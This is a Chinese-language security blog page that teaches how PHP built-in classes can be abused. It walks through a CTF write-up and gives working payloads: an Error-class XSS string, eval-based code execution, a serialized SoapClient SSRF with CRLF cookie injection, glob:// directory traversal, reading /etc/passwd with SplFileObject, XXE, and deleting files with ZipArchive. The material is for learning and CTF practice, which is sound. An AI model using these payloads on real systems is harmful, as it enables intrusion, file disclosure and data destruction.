<!DOCTYPE html>
<html lang="en-us">
  <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
    <title>PHP 原生类使用 | Bubble&#39;s blog</title>

    <meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">    
<meta name="viewport" content="width=device-width,minimum-scale=1">
<meta name="description" content="">
<meta name="generator" content="Hugo 0.128.2">


  <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">


<link rel="stylesheet" href="/css/style.css">



<link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon" />

 
  
  
    
      <script async src="https://www.googletagmanager.com/gtag/js?id=your-google-analytics-id"></script>
      <script>
        var doNotTrack = false;
        if ( false ) {
          var dnt = (navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack);
          var doNotTrack = (dnt == "1" || dnt == "yes");
        }
        if (!doNotTrack) {
          window.dataLayer = window.dataLayer || [];
          function gtag(){dataLayer.push(arguments);}
          gtag('js', new Date());
          gtag('config', 'your-google-analytics-id');
        }
      </script>
    
  









  </head>

  <body>
    <nav class="navigation">
    
        <a href="/"> <span class="arrow">←</span>Home</a>
    
    <a href="/posts">Archive</a>
    <a href="/tags">Tags</a>
    <a href="/about">About</a>
    <a href="/friend">friend</a>

    

    
        
        
    
</nav>


    <main class="main">
      

<section id="single">
    <h1 class="title">PHP 原生类使用</h1>

    <div class="tip">
        <time datetime="0001-01-01 00:00:00 &#43;0000 UTC">Jan 1, 0001</time>
        <span class="split">
          ·
        </span>
        <span>
          2686 words
        </span>
        <span class="split">
          ·
        </span>
        <span>
          6 minute read
        </span>
    </div>

    
    
        
  


    


    <div class="content">
      <p><strong>PHP 常见原生类</strong></p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fallback" data-lang="fallback"><span style="display:flex;"><span>Error/Exception类
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>SoapClient类
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>DirectoryIterator/FilesystemIterator类
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>SplFileObject类
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>SimpleXMLElement类
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>ZipArchive类
</span></span></code></pre></div><h2 id="1-errorexception类的利用"><strong>1. Error/Exception类的利用</strong> <a href="#1-errorexception%e7%b1%bb%e7%9a%84%e5%88%a9%e7%94%a8" class="anchor">🔗</a></h2><p><strong>Error XSS:</strong></p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#666">&lt;?</span>php  
</span></span><span style="display:flex;"><span><span style="color:#a2f;font-weight:bold">echo</span> unserialize(<span style="color:#b8860b">$_GET</span>[<span style="color:#b44">&#39;cmd&#39;</span>]);  
</span></span><span style="display:flex;"><span><span style="color:#080">?&gt;</span><span style="">
</span></span></span></code></pre></div><p>使用Error类可以用来弹xss:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#666">&lt;?</span>php
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$a</span><span style="color:#666">=</span><span style="color:#a2f;font-weight:bold">new</span> Error(<span style="color:#b44">&#34;&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;&#34;</span>);
</span></span><span style="display:flex;"><span><span style="color:#a2f;font-weight:bold">echo</span> urlencode(serialize(<span style="color:#b8860b">$a</span>));
</span></span><span style="display:flex;"><span><span style="color:#080">?&gt;</span><span style="">
</span></span></span></code></pre></div><p>得到:</p>
<blockquote>
<p>O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A29%3A%22%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A29%3A%22D%3A%5Cphpstudy_pro%5CWWW%5Cerror.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D</p>
</blockquote>
<p>将以上字符串赋给cmd就可以看到弹框：</p>
<p><p class="markdown-image">
  <img src="/img/39.png" alt="alt text"  />
</p></p>
<p><strong>Error 命令执行</strong></p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#666">&lt;?</span>php
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$a</span> <span style="color:#666">=</span> <span style="color:#b8860b">$_GET</span>[<span style="color:#b44">&#39;a&#39;</span>];
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$b</span> <span style="color:#666">=</span> <span style="color:#b8860b">$_GET</span>[<span style="color:#b44">&#39;b&#39;</span>];
</span></span><span style="display:flex;"><span><span style="color:#a2f;font-weight:bold">eval</span>(<span style="color:#b44">&#34;echo new </span><span style="color:#b68;font-weight:bold">$a</span><span style="color:#b44">(</span><span style="color:#b68;font-weight:bold">$b</span><span style="color:#b44">());&#34;</span>);
</span></span><span style="display:flex;"><span><span style="color:#080">?&gt;</span><span style="">
</span></span></span></code></pre></div><p>此时通过传<code>?a=Error&amp;b=phpinfo</code>就可以执行命令</p>
<p><p class="markdown-image">
  <img src="/img/40.png" alt="alt text"  />
</p></p>
<h2 id="2-soapclient类的使用"><strong>2. SoapClient类的使用</strong> <a href="#2-soapclient%e7%b1%bb%e7%9a%84%e4%bd%bf%e7%94%a8" class="anchor">🔗</a></h2><p>SOAP 是一种简单的基于 XML 的协议，它使应用程序通过 HTTP 来交换信息。php中的soapClient类可以创建soap数据报文，与wsdl接口进行交互,而WSDL文件是描述SOAP服务的接口。</p>
<p>SoapClient类的构造函数如下：</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#a2f;font-weight:bold">public</span> SoapClient <span style="color:#666">::</span> <span style="color:#b44">SoapClient</span> （mixed <span style="color:#b8860b">$wsdl</span> [，array <span style="color:#b8860b">$options</span> ]）
</span></span></code></pre></div><p>第一个参数是用来指明是否是wsdl模式。</p>
<p>第二个参数为一个数组，如果在wsdl模式下，此参数可选；如果在非wsdl模式下，则必须设置location和uri选项，其中location是要将请求发送到的SOAP服务器的URL，而uri 是SOAP服务的目标命名空间。</p>
<p>示例：</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#b8860b">$a</span> <span style="color:#666">=</span> <span style="color:#a2f;font-weight:bold">new</span> SoapClient(<span style="color:#a2f;font-weight:bold">null</span>,<span style="color:#a2f;font-weight:bold">array</span>(<span style="color:#b44">&#39;location&#39;</span><span style="color:#666">=&gt;</span><span style="color:#b44">&#34;http://127.0.0.1/flag.php&#34;</span>,<span style="color:#b44">&#39;uri&#39;</span><span style="color:#666">=&gt;</span><span style="color:#b44">&#34;123&#34;</span>));
</span></span><span style="display:flex;"><span><span style="color:#a2f;font-weight:bold">echo</span> urlencode(serialize(<span style="color:#b8860b">$a</span>));
</span></span></code></pre></div><p><strong>bestphp‘revenge</strong></p>
<p><strong>知识点：</strong></p>
<ol>
<li>
<p>session反序列化</p>
</li>
<li>
<p>原生类SoapClient的SSRF</p>
</li>
<li>
<p>extract()变量覆盖</p>
</li>
<li>
<p>CRLF</p>
</li>
</ol>
<p>题目打开看到源码如下：</p>
<p><p class="markdown-image">
  <img src="/img/49.png" alt="alt text"  />
</p></p>
<p>dirsearch扫描发现flag.php</p>
<p><p class="markdown-image">
  <img src="/img/50.png" alt="alt text"  />
</p></p>
<p>于是访问：</p>
<p><p class="markdown-image">
  <img src="/img/51.png" alt="alt text"  />
</p></p>
<p>提示要localhost，暗示ssrf,又有session,说明要用到session反序列化，利用php原生类实现ssrf。</p>
<p>现在来分析一下题目源码：</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#666">&lt;?</span>php
</span></span><span style="display:flex;"><span>highlight_file(<span style="color:#800">__FILE__</span>);
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$b</span> <span style="color:#666">=</span> <span style="color:#b44">&#39;implode&#39;</span>;
</span></span><span style="display:flex;"><span>call_user_func(<span style="color:#b8860b">$_GET</span>[<span style="color:#b44">&#39;f&#39;</span>], <span style="color:#b8860b">$_POST</span>);
</span></span><span style="display:flex;"><span>session_start();
</span></span><span style="display:flex;"><span><span style="color:#a2f;font-weight:bold">if</span> (isset(<span style="color:#b8860b">$_GET</span>[<span style="color:#b44">&#39;name&#39;</span>])) {
</span></span><span style="display:flex;"><span>    <span style="color:#b8860b">$_SESSION</span>[<span style="color:#b44">&#39;name&#39;</span>] <span style="color:#666">=</span> <span style="color:#b8860b">$_GET</span>[<span style="color:#b44">&#39;name&#39;</span>];
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>var_dump(<span style="color:#b8860b">$_SESSION</span>);
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$a</span> <span style="color:#666">=</span> <span style="color:#a2f;font-weight:bold">array</span>(reset(<span style="color:#b8860b">$_SESSION</span>), <span style="color:#b44">&#39;welcome_to_the_lctf2018&#39;</span>);
</span></span><span style="display:flex;"><span>call_user_func(<span style="color:#b8860b">$b</span>, <span style="color:#b8860b">$a</span>);
</span></span><span style="display:flex;"><span><span style="color:#080">?&gt;</span><span style="">
</span></span></span></code></pre></div><p>思路：</p>
<ol>
<li>
<p>$b虽然已经给了初值，但能利用这行<code>call_user_func($_GET['f'], $_POST);</code>实现值覆盖。</p>
</li>
<li>
<p>利用session_start()指定php_serialize做序列化引擎，因为反序列化默认引擎是php,将ssrf序列化内容前加<code>|</code>后通过name就可以存储我们构造的session。</p>
</li>
<li>
<p>再看到这行<code>call_user_func($b, $a);</code>想到可以让$b覆盖为<code>call_user_func</code>,此时就变成<code>call_user_func(call_user_func,array($_session,‘welcome_to_the_lctf2018’));</code>,$session这个对象会去调用<code>welcome_to_the_lctf2018</code>这个不存在方法,触发call，服务器就会携带我们设置的cookie去访问flag.php。</p>
</li>
</ol>
<p>构造ssrf内容:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#666">&lt;?</span>php
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$target</span> <span style="color:#666">=</span> <span style="color:#b44">&#39;http://127.0.0.1/flag.php&#39;</span>;
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$b</span> <span style="color:#666">=</span> <span style="color:#a2f;font-weight:bold">new</span> SoapClient(<span style="color:#a2f;font-weight:bold">null</span>,<span style="color:#a2f;font-weight:bold">array</span>(<span style="color:#b44">&#39;location&#39;</span><span style="color:#666">=&gt;</span><span style="color:#b8860b">$target</span>,
</span></span><span style="display:flex;"><span>   	 <span style="color:#b44">&#39;user_agent&#39;</span><span style="color:#666">=&gt;</span><span style="color:#b44">&#34;npfs</span><span style="color:#b62;font-weight:bold">\r\n</span><span style="color:#b44">Cookie:PHPSESSID=123456</span><span style="color:#b62;font-weight:bold">\r\n</span><span style="color:#b44">&#34;</span>,
</span></span><span style="display:flex;"><span>   	 <span style="color:#b44">&#39;uri&#39;</span><span style="color:#666">=&gt;</span><span style="color:#b44">&#34;http://127.0.0.1/&#34;</span>));
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$se</span> <span style="color:#666">=</span> serialize(<span style="color:#b8860b">$b</span>);
</span></span><span style="display:flex;"><span><span style="color:#a2f;font-weight:bold">echo</span> <span style="color:#b44">&#34;|&#34;</span> <span style="color:#666">.</span> urlencode(<span style="color:#b8860b">$se</span>);
</span></span><span style="display:flex;"><span><span style="color:#080">?&gt;</span><span style="">
</span></span></span></code></pre></div><p>浏览器打开得到如下字符串：</p>
<blockquote>
<p>|O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A17%3A%22http%3A%2F%2F127.0.0.1%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A31%3A%22npfs%0D%0ACookie%3APHPSESSID%3D123456%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D</p>
</blockquote>
<p>指定序列化引擎：</p>
<p><p class="markdown-image">
  <img src="/img/52.png" alt="alt text"  />
</p></p>
<p>利用extract函数覆盖b的值并修改cookie即可：</p>
<p><p class="markdown-image">
  <img src="/img/53.png" alt="alt text"  />
</p></p>
<h2 id="3-directoryiteratorfilesystemiterator类的使用"><strong>3. DirectoryIterator/FilesystemIterator类的使用</strong> <a href="#3-directoryiteratorfilesystemiterator%e7%b1%bb%e7%9a%84%e4%bd%bf%e7%94%a8" class="anchor">🔗</a></h2><p>内置类的__toString方法可以获取字符串形式的文件名，再结合<code>glob://</code>或<code>file://</code>协议，即可绕过open_basedir，实现目录遍历</p>
<p>示例：</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#666">&lt;?</span>php
</span></span><span style="display:flex;"><span>highlight_file(<span style="color:#800">__file__</span>);
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$dir</span> <span style="color:#666">=</span> <span style="color:#b8860b">$_GET</span>[<span style="color:#b44">&#39;cmd&#39;</span>];
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$a</span> <span style="color:#666">=</span> <span style="color:#a2f;font-weight:bold">new</span> DirectoryIterator(<span style="color:#b8860b">$dir</span>);
</span></span><span style="display:flex;"><span><span style="color:#a2f;font-weight:bold">echo</span> <span style="color:#b8860b">$a</span>;
</span></span></code></pre></div><p><p class="markdown-image">
  <img src="/img/54.png" alt="alt text"  />
</p></p>
<p>这样只能匹配一个文件，如果想遍历全部文件:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#666">&lt;?</span>php
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$dir</span> <span style="color:#666">=</span> <span style="color:#b8860b">$_GET</span>[<span style="color:#b44">&#39;cmd&#39;</span>];
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$a</span> <span style="color:#666">=</span> <span style="color:#a2f;font-weight:bold">new</span> DirectoryIterator(<span style="color:#b8860b">$dir</span>);
</span></span><span style="display:flex;"><span><span style="color:#a2f;font-weight:bold">foreach</span>(<span style="color:#b8860b">$a</span> <span style="color:#a2f;font-weight:bold">as</span> <span style="color:#b8860b">$f</span>){
</span></span><span style="display:flex;"><span>    <span style="color:#a2f;font-weight:bold">echo</span> (<span style="color:#b8860b">$f</span><span style="color:#666">-&gt;</span><span style="color:#b44">__toString</span>()<span style="color:#666">.</span><span style="color:#b44">&#39;&lt;br&gt;&#39;</span>);
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p><p class="markdown-image">
  <img src="/img/55.png" alt="alt text"  />
</p></p>
<p>payload一句话形式：
<code>$a = new DirectoryIterator(&quot;glob:///*&quot;);foreach($a as $f){echo($f-&gt;__toString().'&lt;br&gt;');}</code></p>
<p>FilesystemIterator类继承于DirectoryIterator类,所以两者作用和用法基本相同，区别在于FilesystemIterator会显示文件的完整路径，而DirectoryIterator只显示文件名:</p>
<p><p class="markdown-image">
  <img src="/img/56.png" alt="alt text"  />
</p></p>
<h2 id="4-splfileobject类"><strong>4. SplFileObject类</strong> <a href="#4-splfileobject%e7%b1%bb" class="anchor">🔗</a></h2><p>读取文件的一行：</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#666">&lt;?</span>php
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$context</span> <span style="color:#666">=</span> <span style="color:#a2f;font-weight:bold">new</span> SplFileObject(<span style="color:#b44">&#39;/etc/passwd&#39;</span>);
</span></span><span style="display:flex;"><span><span style="color:#a2f;font-weight:bold">echo</span> <span style="color:#b8860b">$context</span>;
</span></span></code></pre></div><p>对每一行进行遍历：</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#666">&lt;?</span>php
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$context</span> <span style="color:#666">=</span> <span style="color:#a2f;font-weight:bold">new</span> SplFileObject(<span style="color:#b44">&#39;/etc/passwd&#39;</span>);
</span></span><span style="display:flex;"><span><span style="color:#a2f;font-weight:bold">foreach</span>(<span style="color:#b8860b">$context</span> <span style="color:#a2f;font-weight:bold">as</span> <span style="color:#b8860b">$f</span>){
</span></span><span style="display:flex;"><span>    <span style="color:#a2f;font-weight:bold">echo</span>(<span style="color:#b8860b">$f</span>);
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h2 id="5-simplexmlelement类的使用"><strong>5. SimpleXMLElement类的使用</strong> <a href="#5-simplexmlelement%e7%b1%bb%e7%9a%84%e4%bd%bf%e7%94%a8" class="anchor">🔗</a></h2><p>SimpleXMLElement 是PHP中处理XML的一种简便方式，适合处理简单的XML文档和进行基本的操作。</p>
<p><strong>XXE（XML External Entity）攻击</strong></p>
<p>由于SimpleXMLElement 类在处理XML数据时可能会加载外部实体，如果应用程序没有正确配置或过滤XML输入，攻击者就可以利用这一点来执行XXE攻击。</p>
<p>官方文档中对于SimpleXMLElement 类的构造方法 SimpleXMLElement::__construct 的定义如下：</p>
<p><p class="markdown-image">
  <img src="/img/57.png" alt="alt text"  />
</p></p>
<p><p class="markdown-image">
  <img src="/img/58.png" alt="alt text"  />
</p></p>
<p>第一个参数data就是我们自己设置的payload的url地址，即用于引入的外部实体的url，设置第三个参数为<code>true</code>可以进行远程xml文件载入，实现xxe攻击。</p>
<h2 id="6-ziparchive类的使用"><strong>6. ZipArchive类的使用</strong> <a href="#6-ziparchive%e7%b1%bb%e7%9a%84%e4%bd%bf%e7%94%a8" class="anchor">🔗</a></h2><p>ZipArchive类可以对文件进行压缩和解压</p>
<p>以下一些常见的类方法：</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">addEmptyDir：添加一个新的文件目录</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">addFile：将文件添加到指定zip压缩包中</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">addFromString：添加新的文件同时将内容添加进去</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">close：关闭ziparchive</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">extractTo：将压缩包解压</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">open：打开一个zip压缩包以供读取、写入或创建</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">deleteIndex：删除压缩包中的某一个文件，</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">deleteName：删除压缩包中的某一个文件名称，同时也将文件删除</span>
</span></span></code></pre></div><p>重点看<code>open</code>方法：</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">open</span> ( string <span style="color:#b8860b">$filename</span> , int <span style="color:#b8860b">$flags</span>  ) <span style="color:#666">:</span> mixed
</span></span></code></pre></div><p>string $filename：表示要打开的 ZIP 文件的路径和文件名。</p>
<p>int $flags：第二个参数类型为整数，用于指定打开 ZIP 文件时使用的模式。这个参数可以是一个或多个 ZipArchive 类中定义的常量的组合:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">OVERWRITE：总是以一个新的压缩包开始，此模式下如果已经存在则会被覆盖或删除。</span>
</span></span><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">CREATE：如果不存在则创建一个zip压缩包。</span>
</span></span><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">RDONLY：只读模式打开压缩包。</span>
</span></span><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">EXCL：如果压缩包已经存在，则出错。</span>
</span></span><span style="display:flex;"><span>ZipArchive<span style="color:#666">::</span><span style="color:#b44">CHECKCONS：对压缩包执行额外的一致性检查，如果失败则显示错误。</span>
</span></span></code></pre></div><p>注意，如果设置 flags 参数的值为 <code>ZipArchive::OVERWRITE </code>的话，可以把指定文件删除。跟进方法可以看到 const OVERWRITE = 8，也就是将 OVERWRITE 定义为了常量8，我们在调用时也可以直接将 $flags 赋值为8。</p>
<p>也就是说我们可以利用 ZipArchive 原生类调用 open 方法删除目标主机上的文件:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#f8f8f8;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#b8860b">$a</span> <span style="color:#666">=</span> <span style="color:#a2f;font-weight:bold">new</span> ZipArchive();
</span></span><span style="display:flex;"><span><span style="color:#b8860b">$a</span><span style="color:#666">-&gt;</span><span style="color:#b44">open</span>(<span style="color:#b44">&#39;1.txt&#39;</span>,ZipArchive<span style="color:#666">::</span><span style="color:#b44">OVERWRITE</span>);  
</span></span><span style="display:flex;"><span><span style="color:#080;font-style:italic">// ZipArchive::OVERWRITE:  总是以一个新的压缩包开始，此模式下如果已经存在则会被覆盖
</span></span></span><span style="display:flex;"><span><span style="color:#080;font-style:italic">// 因为没有保存，所以效果就是删除了1.txt
</span></span></span></code></pre></div><p>例题可以看这道:</p>
<p><a href="https://blog.csdn.net/jvkyvly/article/details/115052002" target="_blank" rel="noopener">https://blog.csdn.net/jvkyvly/article/details/115052002</a></p>
<p>参考：</p>
<p><a href="https://drun1baby.top/2023/04/11/PHP-%e5%8e%9f%e7%94%9f%e7%b1%bb%e5%ad%a6%e4%b9%a0/#0x07-%e4%bd%bf%e7%94%a8-ZipArchive-%e7%b1%bb%e6%9d%a5%e5%88%a0%e9%99%a4%e6%96%87%e4%bb%b6" target="_blank" rel="noopener">https://drun1baby.top/2023/04/11/PHP-原生类学习/#0x07-使用-ZipArchive-类来删除文件</a></p>
    </div>

    
    
    
  <div id="comment">
    
    <div id="disqus_thread"></div>
<script>
    window.disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "your-disqus-shortname" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
  </div>


</section>


    </main>
    
    <footer id="footer">
    
        <div id="social">


    <a class="symbol" href="https://github.com/bubbleo0O" rel="me" target="_blank">
        
        <svg fill="#bbbbbb" width="28" height="28"  viewBox="0 0 72 72" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    
    <title>Github</title>
    <desc>Created with Sketch.</desc>
    <defs></defs>
    <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
        <g id="Social-Icons---Rounded-Black" transform="translate(-264.000000, -939.000000)">
            <g id="Github" transform="translate(264.000000, 939.000000)">
                <path d="M8,72 L64,72 C68.418278,72 72,68.418278 72,64 L72,8 C72,3.581722 68.418278,-8.11624501e-16 64,0 L8,0 C3.581722,8.11624501e-16 -5.41083001e-16,3.581722 0,8 L0,64 C5.41083001e-16,68.418278 3.581722,72 8,72 Z" id="Rounded" fill="#bbbbbb"></path>
                <path d="M35.9985,13 C22.746,13 12,23.7870921 12,37.096644 C12,47.7406712 18.876,56.7718301 28.4145,59.9584121 C29.6145,60.1797862 30.0525,59.4358488 30.0525,58.7973276 C30.0525,58.2250681 30.0315,56.7100863 30.0195,54.6996482 C23.343,56.1558981 21.9345,51.4693938 21.9345,51.4693938 C20.844,48.6864054 19.2705,47.9454799 19.2705,47.9454799 C17.091,46.4500754 19.4355,46.4801943 19.4355,46.4801943 C21.843,46.6503662 23.1105,48.9634994 23.1105,48.9634994 C25.2525,52.6455377 28.728,51.5823398 30.096,50.9649018 C30.3135,49.4077535 30.9345,48.3460615 31.62,47.7436831 C26.2905,47.1352808 20.688,45.0691228 20.688,35.8361671 C20.688,33.2052792 21.6225,31.0547881 23.1585,29.3696344 C22.911,28.7597262 22.0875,26.3110578 23.3925,22.9934585 C23.3925,22.9934585 25.4085,22.3459017 29.9925,25.4632101 C31.908,24.9285993 33.96,24.6620468 36.0015,24.6515052 C38.04,24.6620468 40.0935,24.9285993 42.0105,25.4632101 C46.5915,22.3459017 48.603,22.9934585 48.603,22.9934585 C49.9125,26.3110578 49.089,28.7597262 48.8415,29.3696344 C50.3805,31.0547881 51.309,33.2052792 51.309,35.8361671 C51.309,45.0917119 45.6975,47.1292571 40.3515,47.7256117 C41.2125,48.4695491 41.9805,49.9393525 41.9805,52.1877301 C41.9805,55.4089489 41.9505,58.0067059 41.9505,58.7973276 C41.9505,59.4418726 42.3825,60.1918338 43.6005,59.9554002 C53.13,56.7627944 60,47.7376593 60,37.096644 C60,23.7870921 49.254,13 35.9985,13" fill="#FFFFFF"></path>
            </g>
        </g>
    </g>
</svg>
    </a>

    <a class="symbol" href="your-stackoverflow-link" rel="me" target="_blank">
        
        <svg fill="#bbbbbb" width="28" height="28" viewBox="0 0 72 72" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    
    <title>stackoverflow</title>
    <desc>Created with Sketch.</desc>
    <defs></defs>
    <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
        <g id="Social-Icons---Rounded-Black" transform="translate(-488.000000, -1163.000000)">
            <g id="stackoverflow" transform="translate(488.000000, 1163.000000)">
                <path d="M8,72 L64,72 C68.418278,72 72,68.418278 72,64 L72,8 C72,3.581722 68.418278,-8.11624501e-16 64,0 L8,0 C3.581722,8.11624501e-16 -5.41083001e-16,3.581722 0,8 L0,64 C5.41083001e-16,68.418278 3.581722,72 8,72 Z" id="Rounded" fill="#bbbbbb"></path>
                <path d="M42.0860128,53.5922927 L22.9745951,53.6011499 L22.9729497,49.5538824 L42.0835447,49.5440929 L42.0860128,53.5922927 L42.0860128,53.5922927 Z M55,30.6708298 L51.7306912,12 L47.7087256,12.6920259 L50.9775643,31.3628557 L55,30.6708298 L55,30.6708298 Z M42.5455518,44.3547147 L23.5156994,42.616026 L23.1410164,46.6470941 L42.1712214,48.3841513 L42.5455518,44.3547147 L42.5455518,44.3547147 Z M43.8009984,39.0731519 L25.3459811,34.1539179 L24.285633,38.0621508 L42.7419431,42.9819676 L43.8009984,39.0731519 L43.8009984,39.0731519 Z M46.2103463,34.4436411 L29.7494464,24.8164635 L27.6748215,28.3015328 L44.1365441,37.9292931 L46.2103463,34.4436411 L46.2103463,34.4436411 Z M50.2466504,31.6088756 L46.8745036,33.8883189 L36.106599,18.2318456 L39.4792159,15.9517031 L50.2466504,31.6088756 Z M45.3315807,40.2784283 L48.5799693,40.2784283 L48.5799693,60 L17,60 L17,40.2784283 L20.2648427,40.2784283 L20.2648427,56.8243495 L45.3315807,56.8243495 L45.3315807,40.2784283 Z" fill="#FFFFFF"></path>
            </g>
        </g>
    </g>
</svg>
    </a>

    <a class="symbol" href="your-twitter-link" rel="me" target="_blank">
        
